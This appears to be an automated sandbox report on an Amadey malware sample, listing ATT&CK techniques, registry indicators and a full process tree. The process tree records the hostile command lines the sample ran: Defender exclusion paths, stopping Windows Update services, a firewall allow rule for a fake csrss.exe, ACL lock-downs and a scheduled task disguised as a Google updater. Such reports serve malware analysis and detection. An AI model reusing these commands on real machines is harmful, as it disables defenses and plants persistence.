amadey | fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	winlog.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	winlog.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
41	4112	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
4012	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	winlog.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	winlog.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	winlog.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	winlog.exe

Executes dropped EXE 13 IoCs

pid	Process
2272	D4DF.exe
1292	D7AF.exe
4756	D8F8.exe
3392	oneetx.exe
1336	ss41.exe
2884	taskhost.exe
692	winlog.exe
3000	msedge.exe
4220	toolspub2.exe
4336	taskhost.exe
812	winlog.exe
4212	msedge.exe
664	31839b57a4f11171d6abc8bbc4451ee4.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	winlog.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	winlog.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
692	winlog.exe
812	winlog.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 3208 set thread context of 1888	3208	fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f.exe	70
PID 2272 set thread context of 2236	2272	D4DF.exe	74
PID 2884 set thread context of 4112	2884	taskhost.exe	214
PID 4336 set thread context of 3124	4336	taskhost.exe	96

Launches sc.exe 30 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3760	sc.exe
5092	sc.exe
2760	sc.exe
4516	sc.exe
4412	sc.exe
4756	sc.exe
2024	sc.exe
3596	sc.exe
1340	sc.exe
2064	sc.exe
732	sc.exe
2200	sc.exe
1512	sc.exe
712	sc.exe
2640	sc.exe
4940	sc.exe
4240	sc.exe
2752	sc.exe
4716	sc.exe
432	sc.exe
4176	sc.exe
4768	sc.exe
4504	sc.exe
4592	sc.exe
1388	sc.exe
4804	sc.exe
3748	sc.exe
4824	sc.exe
3584	sc.exe
1648	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
212	3208	WerFault.exe	69

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
1784	schtasks.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	62	Go-http-client/1.1

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1888	AppLaunch.exe
1888	AppLaunch.exe
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3276	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1888	AppLaunch.exe

Suspicious use of AdjustPrivilegeToken 31 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeDebugPrivilege	4756	sc.exe
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3208 wrote to memory of 1888	3208	fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f.exe	70
PID 3208 wrote to memory of 1888	3208	fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f.exe	70
PID 3208 wrote to memory of 1888	3208	fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f.exe	70
PID 3208 wrote to memory of 1888	3208	fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f.exe	70
PID 3208 wrote to memory of 1888	3208	fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f.exe	70
PID 3208 wrote to memory of 1888	3208	fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f.exe	70
PID 3276 wrote to memory of 2272	3276	Process not Found	73
PID 3276 wrote to memory of 2272	3276	Process not Found	73
PID 3276 wrote to memory of 2272	3276	Process not Found	73
PID 2272 wrote to memory of 2236	2272	D4DF.exe	74
PID 2272 wrote to memory of 2236	2272	D4DF.exe	74
PID 2272 wrote to memory of 2236	2272	D4DF.exe	74
PID 2272 wrote to memory of 2236	2272	D4DF.exe	74
PID 2272 wrote to memory of 2236	2272	D4DF.exe	74
PID 3276 wrote to memory of 1292	3276	Process not Found	75
PID 3276 wrote to memory of 1292	3276	Process not Found	75
PID 3276 wrote to memory of 1292	3276	Process not Found	75
PID 3276 wrote to memory of 4756	3276	Process not Found	76
PID 3276 wrote to memory of 4756	3276	Process not Found	76
PID 3276 wrote to memory of 4756	3276	Process not Found	76
PID 1292 wrote to memory of 3392	1292	D7AF.exe	77
PID 1292 wrote to memory of 3392	1292	D7AF.exe	77
PID 1292 wrote to memory of 3392	1292	D7AF.exe	77
PID 3392 wrote to memory of 1784	3392	oneetx.exe	81
PID 3392 wrote to memory of 1784	3392	oneetx.exe	81
PID 3392 wrote to memory of 1784	3392	oneetx.exe	81
PID 3392 wrote to memory of 2392	3392	oneetx.exe	79
PID 3392 wrote to memory of 2392	3392	oneetx.exe	79
PID 3392 wrote to memory of 2392	3392	oneetx.exe	79
PID 2392 wrote to memory of 660	2392	cmd.exe	82
PID 2392 wrote to memory of 660	2392	cmd.exe	82
PID 2392 wrote to memory of 660	2392	cmd.exe	82
PID 2392 wrote to memory of 4264	2392	cmd.exe	190
PID 2392 wrote to memory of 4264	2392	cmd.exe	190
PID 2392 wrote to memory of 4264	2392	cmd.exe	190
PID 2392 wrote to memory of 4256	2392	cmd.exe	84
PID 2392 wrote to memory of 4256	2392	cmd.exe	84
PID 2392 wrote to memory of 4256	2392	cmd.exe	84
PID 2392 wrote to memory of 2124	2392	cmd.exe	168
PID 2392 wrote to memory of 2124	2392	cmd.exe	168
PID 2392 wrote to memory of 2124	2392	cmd.exe	168
PID 2392 wrote to memory of 3996	2392	cmd.exe	86
PID 2392 wrote to memory of 3996	2392	cmd.exe	86
PID 2392 wrote to memory of 3996	2392	cmd.exe	86
PID 2392 wrote to memory of 2180	2392	cmd.exe	121
PID 2392 wrote to memory of 2180	2392	cmd.exe	121
PID 2392 wrote to memory of 2180	2392	cmd.exe	121
PID 3392 wrote to memory of 1336	3392	oneetx.exe	88
PID 3392 wrote to memory of 1336	3392	oneetx.exe	88
PID 3392 wrote to memory of 2884	3392	oneetx.exe	90
PID 3392 wrote to memory of 2884	3392	oneetx.exe	90
PID 3392 wrote to memory of 2884	3392	oneetx.exe	90
PID 2884 wrote to memory of 4112	2884	taskhost.exe	214
PID 2884 wrote to memory of 4112	2884	taskhost.exe	214
PID 2884 wrote to memory of 4112	2884	taskhost.exe	214
PID 2884 wrote to memory of 4112	2884	taskhost.exe	214
PID 2884 wrote to memory of 4112	2884	taskhost.exe	214
PID 3392 wrote to memory of 692	3392	oneetx.exe	92
PID 3392 wrote to memory of 692	3392	oneetx.exe	92
PID 3392 wrote to memory of 3000	3392	oneetx.exe	93
PID 3392 wrote to memory of 3000	3392	oneetx.exe	93
PID 3392 wrote to memory of 4220	3392	oneetx.exe	94
PID 3392 wrote to memory of 4220	3392	oneetx.exe	94
PID 3392 wrote to memory of 4220	3392	oneetx.exe	94

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f.exe
"C:\Users\Admin\AppData\Local\Temp\fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3208
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:1888
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 212
  2⤵
  - Program crash
  PID:212

C:\Users\Admin\AppData\Local\Temp\D4DF.exe
C:\Users\Admin\AppData\Local\Temp\D4DF.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2272
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  PID:2236

C:\Users\Admin\AppData\Local\Temp\D7AF.exe
C:\Users\Admin\AppData\Local\Temp\D7AF.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1292
- C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
  "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3392
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2392
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:660
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "oneetx.exe" /P "Admin:N"
      4⤵
      PID:4264
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "oneetx.exe" /P "Admin:R" /E
      4⤵
      PID:4256
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:2124
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\207aa4515d" /P "Admin:N"
      4⤵
      PID:3996
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\207aa4515d" /P "Admin:R" /E
      4⤵
      PID:2180
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:1784
- - C:\Users\Admin\AppData\Local\Temp\1000454001\ss41.exe
    "C:\Users\Admin\AppData\Local\Temp\1000454001\ss41.exe"
    3⤵
    - Executes dropped EXE
    PID:1336
- - C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
    "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:2884
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:4112
- - C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe
    "C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:692
- - C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe
    "C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"
    3⤵
    - Executes dropped EXE
    PID:3000
- - C:\Users\Admin\AppData\Local\Temp\1000455001\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\1000455001\toolspub2.exe"
    3⤵
    - Executes dropped EXE
    PID:4220
  - - C:\Users\Admin\AppData\Local\Temp\1000455001\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\1000455001\toolspub2.exe"
      4⤵
      PID:2980
- - C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
    "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:4336
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:3124
- - C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe
    "C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:812
  - - C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      4⤵
      PID:1708
- - C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe
    "C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"
    3⤵
    - Executes dropped EXE
    PID:4212
- - C:\Users\Admin\AppData\Local\Temp\1000456001\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\1000456001\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    - Executes dropped EXE
    PID:664
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:2640
  - - C:\Users\Admin\AppData\Local\Temp\1000456001\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\1000456001\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      PID:1396
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Blocklisted process makes network request
        
        PID:4112
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:4952
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:4012
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4808
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:2444
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        
        PID:3948
- - C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
    "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
    3⤵
    PID:4244
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:1348
- - C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe
    "C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"
    3⤵
    PID:1796
- - C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe
    "C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"
    3⤵
    PID:4248
- - C:\Users\Admin\AppData\Local\Temp\1000457001\latestX.exe
    "C:\Users\Admin\AppData\Local\Temp\1000457001\latestX.exe"
    3⤵
    PID:2652
- - C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
    "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
    3⤵
    PID:3816
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:3772
- - C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe
    "C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"
    3⤵
    PID:888
- - C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe
    "C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"
    3⤵
    PID:4644

C:\Users\Admin\AppData\Local\Temp\D8F8.exe
C:\Users\Admin\AppData\Local\Temp\D8F8.exe
1⤵
- Executes dropped EXE
PID:4756

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:2324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:4328

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:4672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:3592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:408
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:2180

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:4372
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:712
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4716
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2640
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:2024
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:3584

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:4384
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4824
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4504
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:432
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:3760
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:3596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:4664

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:3940
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:4980
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:2384
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:644
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:1280

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:512
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:4180
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:4004
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:1984
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:2184

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:4980
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4592
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2760
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1340
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:4176
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:2064

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:4200
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4516
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4940
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5092
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:1388
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:4804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:2388

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:5072
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:2124

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:1148
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:3764
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:4264
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:2272
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:884

C:\Program Files\Google\Chrome\updater.exe
